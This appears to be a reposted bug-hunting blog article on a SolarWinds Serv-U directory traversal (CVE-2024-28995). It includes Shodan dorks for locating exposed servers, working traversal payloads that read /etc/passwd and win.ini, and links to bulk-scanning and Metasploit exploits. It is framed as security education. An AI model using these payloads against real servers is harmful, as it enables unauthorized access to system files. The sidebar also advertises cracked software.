LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Testing SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)

5 months ago 36
BOOK THIS SPACE FOR AD
ARTICLE AD

NoorHomaid

It’s been a while since my last publication here. Here i will be explaining SolarWinds Serv-U was susceptible to a directory traversal vulnerability

What is SolarWinds Serv-U ?

SolarWinds Serv-U is a file transfer server that allows you to securely send and receive files between computers on a network. It comes in two editions (Serv-U FTP and Serv-U MFT).

What is SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)?

It is a directory transversal vulnerability that would allow access to read sensitive files, such as /etc/passwd and other system files, on the system running Serv-U, even if they are not authorized to do so.

It impacts Serv-U 15.4.2 HF 1 and previous versions.

Level of privilege required to exploit the vulnerability :

None, unauthenticated attacker can access and read file systems.

Finding the target

We can use osint like shodan to gather targets that are running SolarWinds Serv-U , this is useful usually if you are working with bug hunting.

Shodan dork:

product:"Serv-U ftpd"

Using shodan CLI

shodan search product:Serv-U ftpd

Check the the result of the impacted version of Serv-U.

For pen-testers, you might customize the search query by adding the target you are testing in the search query via the ssl certificate filter.

Exploiting the vulnerability

The vulnerability is accessed via a GET request to the root (/) and using a parameter named “InternalDir” and “InternalFile” being set to the desired file to read.

A) Manul

The payload used for exploiting in (Linux) :

GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd

The payload used for exploiting in (Windows) :

GET /?InternalDir=/../../../../windows&InternalFile=win.ini

Tip: to search for targets running server on Windows we can add “os:Windows” to our previous shodan dork that we used to find the target.

After intercepting the GET request using burp, we can add the payload and we will get the result

Note: other sensitive file to read on the vulnerable Serv-U server

/ProgramData/RhinoSoft/Serv-U/Serv-U-StartupLog.txt
(contains startup logs info for the Serv-U FTP server)

B) Automation(scripts)

You can use the following scripts to exploit single or a multiple targets (Bulk scanning) all at once:

https://github.com/bigb0x/CVE-2024-28995

C) Public exploit (Metasploit): gather/solarwinds_servu_fileread_cve_2024_28995

https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-SOLARWINDS_SERVU_FILEREAD_CVE_2024_28995-

Happy hunting !

References:

Read Entire Article
  3. Testing SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)

Related

IBM Fixes RCE Vulnerabilities in Data Virtualization Manager and Security SOAR

IBM Fixes RCE Vulnerabilities in Data Virtualization Manager and Security SOAR

Firefox and Windows Zero-Days Exploited by Russian RomCom Hackers: A Cybersecurity Wake-Up Call!

Firefox and Windows Zero-Days Exploited by Russian RomCom Hackers: A Cybersecurity Wake-Up Call!

Critical Vulnerabilities Discovered in Popular Anti-Spam Plugin for WordPress ️

Critical Vulnerabilities Discovered in Popular Anti-Spam Plugin for WordPress ️

Bugbounty Hunting: The First Step After Finding Your Target

Bugbounty Hunting: The First Step After Finding Your Target

Challenges and Pitfalls of Automating Bug Bounty Submissions with AI

Challenges and Pitfalls of Automating Bug Bounty Submissions with AI

Find Website Vulnerabilities with One Hacking Tool

Find Website Vulnerabilities with One Hacking Tool

Trending

1. Mahindra XEV 9e Launch
2. Vodafone Idea share
3. Zimbabwe vs Pakistan
4. Zainab Ravdjee
5. Pakistan
6. Preamble
7. Realme GT 7 Pro
8. PAN 2.0 Project
9. Sachin Baby
10. 26/11

Popular

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved